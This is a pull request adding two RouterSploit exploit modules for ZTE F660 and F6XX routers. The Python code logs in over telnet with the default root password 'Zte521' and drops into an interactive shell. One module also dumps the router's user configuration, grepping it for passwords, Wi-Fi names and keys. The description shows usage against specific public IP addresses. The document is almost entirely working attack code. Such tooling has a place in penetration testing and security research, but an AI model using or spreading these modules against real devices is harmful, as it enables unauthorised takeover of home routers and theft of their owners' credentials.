### PR TITLE
Add exploits ZTE F660 Config Disclosure & ZTE F6XX Default root password

### DIFF
--- a/routersploit/modules/exploits/zte/f660_config_disclosure.py
+++ b/routersploit/modules/exploits/zte/f660_config_disclosure.py
@@ -1,0 +1,82 @@
+import telnetlib
+
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for ZTE F660 config disclosure vulnerability.
+    If the target is vulnerable it is possible to authenticate to the device"
+    """
+    __info__ = {
+        'name': 'ZTE F660 Config Disclosure',
+        'description': 'Module exploits ZTE F660 config disclosure vulnerability. If the target is is possible to authentiate to the device.',
+        'authors': [
+            'devilscream',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            '',
+        ],
+        'devices': [
+            'ZTE ZXA10 F660'
+        ]
+    }
+
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+
+    username = "root"
+    password = "Zte521"
+    config = "cat /userconfig/cfg/db_user_cfg.xml"
+
+    def run(self):
+        try:
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+            tn.write("\r\n")
+
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+
+            if i != -1:
+                return False
+            else:
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                    print_success("Telnet - Successful authentication")
+                    tn.write(self.config + "\r\n")
+                    tn.interact()
+
+            tn.close()
+        except:
+            print_error("Connection Error")
+            return
+
+    def check(self):
+        try:
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+            tn.write("\r\n")
+
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            tn.close()
+
+            if i != -1:
+                return False
+            else:
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                    tn.close()
+                    return True
+            tn.close()
+        except:
+            return False
+
+        return False

--- a/routersploit/modules/exploits/zte/f660_config_disclosure.py
+++ b/routersploit/modules/exploits/zte/f660_config_disclosure.py
@@ -4,6 +4,7 @@ from routersploit import (
     exploits,
     print_success,
     print_error,
+    mute
 )
 
 
@@ -29,7 +30,7 @@ class Exploit(exploits.Exploit):
     target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
     username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
     password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
-    config = "cat /userconfig/cfg/db_user_cfg.xml"
+    config = "cat /userconfig/cfg/db_user_cfg.xml | grep -E 'UserName|Username|Password|password|ESSID|KeyPhase'"
 
     def run(self):
         try:
@@ -38,7 +39,6 @@ class Exploit(exploits.Exploit):
             tn.write(self.username + "\r\n")
             tn.expect(["Password: ", "password"], 5)
             tn.write(self.password + "\r\n")
-            tn.write("\r\n")
 
             (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
 
@@ -48,12 +48,14 @@ class Exploit(exploits.Exploit):
                 if any(map(lambda x: x in res, ["#", "$", ">"])):
                     print_success("Telnet - Successful authentication")
                     tn.write(self.config + "\r\n")
+                    tn.interact()
 
             tn.close()
         except:
             print_error("Connection Error")
             return
 
+    @mute
     def check(self):
         try:
             tn = telnetlib.Telnet(self.target, 23)
@@ -69,9 +71,10 @@ class Exploit(exploits.Exploit):
             if i != -1:
                 return False
             else:
-                if any(map(lambda x: x in res, ["<DM name="])):
-                    tn.close()
-                    return True
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                    if any(map(lambda x: x in res, ["<DM name="])):
+                        tn.close()
+                        return True
             tn.close()
         except:
             return False

--- a/routersploit/modules/exploits/zte/f660_config_disclosure.py
+++ b/routersploit/modules/exploits/zte/f660_config_disclosure.py
@@ -9,18 +9,17 @@ from routersploit import (
 
 class Exploit(exploits.Exploit):
     """
-    Exploit implementation for ZTE F660 config disclosure vulnerability.
+    Exploit implementation for ZTE F660 Config Disclosure.
     If the target is vulnerable it is possible to authenticate to the device"
     """
     __info__ = {
         'name': 'ZTE F660 Config Disclosure',
-        'description': 'Module exploits ZTE F660 config disclosure vulnerability. If the target is is possible to authentiate to the device.',
+        'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
         'authors': [
-            'devilscream',  # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+            'devilscream'  # vulnerability discovery
         ],
         'references': [
-            '',
+            'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html'
         ],
         'devices': [
             'ZTE ZXA10 F660'
@@ -28,9 +27,8 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
-
-    username = "root"
-    password = "Zte521"
+    username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
+    password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
     config = "cat /userconfig/cfg/db_user_cfg.xml"
 
     def run(self):
@@ -50,7 +48,6 @@ class Exploit(exploits.Exploit):
                 if any(map(lambda x: x in res, ["#", "$", ">"])):
                     print_success("Telnet - Successful authentication")
                     tn.write(self.config + "\r\n")
-                    tn.interact()
 
             tn.close()
         except:
@@ -64,7 +61,7 @@ class Exploit(exploits.Exploit):
             tn.write(self.username + "\r\n")
             tn.expect(["Password: ", "password"], 5)
             tn.write(self.password + "\r\n")
-            tn.write("\r\n")
+            tn.write(self.config + "\r\n")
 
             (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
             tn.close()
@@ -72,7 +69,7 @@ class Exploit(exploits.Exploit):
             if i != -1:
                 return False
             else:
-                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                if any(map(lambda x: x in res, ["<DM name="])):
                     tn.close()
                     return True
             tn.close()

--- a/routersploit/modules/exploits/zte/f6xx_default_root.py
+++ b/routersploit/modules/exploits/zte/f6xx_default_root.py
@@ -50,6 +50,7 @@ class Exploit(exploits.Exploit):
             else:
                 if any(map(lambda x: x in res, ["#", "$", ">"])):
                     print_success("Telnet - Successful authentication")
+                    tn.write("\r\n")
                     tn.interact()
 
             tn.close()

--- a/routersploit/modules/exploits/zte/f6xx_default_root.py
+++ b/routersploit/modules/exploits/zte/f6xx_default_root.py
@@ -14,13 +14,12 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'ZTE F6XX Default root',
-        'description': 'Module exploits ZTE F6XX default root password. If the target is is possible to authentiate to the device.',
+        'description': 'Module exploits ZTE F6XX default root password. If the target is possible to authentiate to the device.',
         'authors': [
-            'devilscream',  # vulnerability discovery
-            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+            'devilscream'  # vulnerability discovery
         ],
         'references': [
-            '',
+            'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html'
         ],
         'devices': [
             'ZTE ZXA10 F660',
@@ -30,9 +29,8 @@ class Exploit(exploits.Exploit):
     }
 
     target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
-
-    username = "root"
-    password = "Zte521"
+    username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
+    password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
 
     def run(self):
         try:
@@ -58,6 +56,7 @@ class Exploit(exploits.Exploit):
             print_error("Connection Error")
             return
 
+    @mute
     def check(self):
         try:
             tn = telnetlib.Telnet(self.target, 23)

--- a/routersploit/modules/exploits/zte/f6xx_default_root.py
+++ b/routersploit/modules/exploits/zte/f6xx_default_root.py
@@ -56,7 +56,6 @@ class Exploit(exploits.Exploit):
             print_error("Connection Error")
             return
 
-    @mute
     def check(self):
         try:
             tn = telnetlib.Telnet(self.target, 23)

--- a/routersploit/modules/exploits/zte/f6xx_default_root.py
+++ b/routersploit/modules/exploits/zte/f6xx_default_root.py
@@ -1,0 +1,82 @@
+import telnetlib
+
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for ZTE F6XX default root password.
+    If the target is vulnerable it is possible to authenticate to the device"
+    """
+    __info__ = {
+        'name': 'ZTE F6XX Default root',
+        'description': 'Module exploits ZTE F6XX default root password. If the target is is possible to authentiate to the device.',
+        'authors': [
+            'devilscream',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            '',
+        ],
+        'devices': [
+            'ZTE ZXA10 F660',
+            'ZTE ZXA10 F609',
+            'ZTE ZXA10 F620'
+        ]
+    }
+
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+
+    username = "root"
+    password = "Zte521"
+
+    def run(self):
+        try:
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+            tn.write("\r\n")
+
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+
+            if i != -1:
+                return False
+            else:
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                    print_success("Telnet - Successful authentication")
+                    tn.interact()
+
+            tn.close()
+        except:
+            print_error("Connection Error")
+            return
+
+    def check(self):
+        try:
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+            tn.write("\r\n")
+
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            tn.close()
+
+            if i != -1:
+                return False
+            else:
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                    tn.close()
+                    return True
+            tn.close()
+        except:
+            return False
+
+        return False

--- a/routersploit/modules/exploits/zte/f6xx_default_root.py
+++ b/routersploit/modules/exploits/zte/f6xx_default_root.py
@@ -4,6 +4,7 @@ from routersploit import (
     exploits,
     print_success,
     print_error,
+    mute
 )
 
 
@@ -55,7 +56,8 @@ class Exploit(exploits.Exploit):
         except:
             print_error("Connection Error")
             return
-
+    
+    @mute
     def check(self):
         try:
             tn = telnetlib.Telnet(self.target, 23)


### PR DESCRIPTION
* Add exploits ZTE F660 Config Disclosure
* Add exploits ZTE F6XX Default root password

Example:
```
use exploits/zte/f660_config_disclosure
set target 36.79.119.10
exploit
```

```
use exploits/zte/f6xx_default_root
set target 36.74.22.122
exploit
```

